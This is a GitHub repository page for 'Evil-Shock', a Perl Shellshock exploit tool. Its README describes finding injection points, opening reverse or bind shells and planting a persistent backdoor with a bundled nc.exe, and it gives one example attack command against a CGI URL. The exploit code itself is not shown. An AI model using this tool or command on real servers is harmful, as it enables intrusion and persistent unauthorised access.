Skip to content
/ Evil-Shock Public

Shock the shell! Exploit many injection method for shellshock

18 stars 9 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

DeaDHackS/Evil-Shock

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

22 Commits
nc
nc
 
 
LISCENSE
LISCENSE
 
 
README.md
README.md
 
 
evilshock.pl
evilshock.pl
 
 

Repository files navigation

Evil-Shock Description

Evil-Shock is a powerful tool made to exploit Shellshock, what's special with Evil-Shock is that it doesn't base his attacks on one parameter, example another tool might inject a simple "echo Vulnerable" and see if the server executes that. In many case the server wont execute that command but can execute another command ;) Evil-Shock will find the perfect command also known as Injection Point and then execute further commands to gain remote access via the injection point, so far for the first version Evil-Shock can check for 4 different Injection Point:

1 - NSLookup

2 - Echo

3 - LS

4 - Ping

In further version more injections points will be added.

Test / Train with Evil-Shock!

I recommend download and installing in your favorite virtual machine manager the iso file from VulnHub: https://www.vulnhub.com/entry/pentester-lab-cve-2014-6271-shellshock,104/ Which was used to test and develop Evil-Shock!

WINDOWS VERSION WARNING

Netcat normally doesn't exist for Windows, but i had a look into Metasploit windows-libraries and it has a nc.exe program for backdooring. Please report any case of infections while using that nc.exe, thanks!

System Supported:

Linux and Windows! Make sure if running on windows to not remove the nc file, since it contains the nc.exe which allow you to backdoor a server. On linux make sure to have netcat installed.

Screenshots / Examples

Bind Shell / Auto-Point-Injection:

BindShell Example

Reverse Shell / Auto-Point-Injection:

WARNING: MY FIREWALL IS BLOCKING CONNECTION SO I CANNOT SHOW THE REVERSE SHELL BUT IT SHOULD WORK FINE IN ANY ANOTHER CASE :)

ReverseShell Example

Features

Evil-Shock is equiped with some useful and interresting command:

t|target= : This will set the target.
shell=<reverse / bind> : This will set the shell type. p|port= : Port to open the shell on.
help : Print help menu.
inject= : This will allow an user to inject a custom command into the web server.
user-agent= : When info grabbing you can choose to have a custom user-agent or use the default one.
srv-persistent : When only bind shell is selected and injected this will then injected a persistent backdoor.
inject-only : This will test Injection Points only, not inject anything else.

Shells

Evil-Shock supports 3 different type of shells, reverse, bind and bash shells!

Reverse - Victim will connect back to you.

Bind - You will connect directly to the target (Recommended)

Bash(Reverse Only) - Rather than creating a netcat listener on the victim and bash listener will be injected.

Usage

perl evilshock.pl -help

Examples

perl evilshock -t=http://shellshock.site/cgi-bin/menu --shell=bind --port=1234 --srv-persistent

About

Shock the shell! Exploit many injection method for shellshock

Resources

Readme
Activity

Stars

18 stars

Watchers

2 watching

Forks

9 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages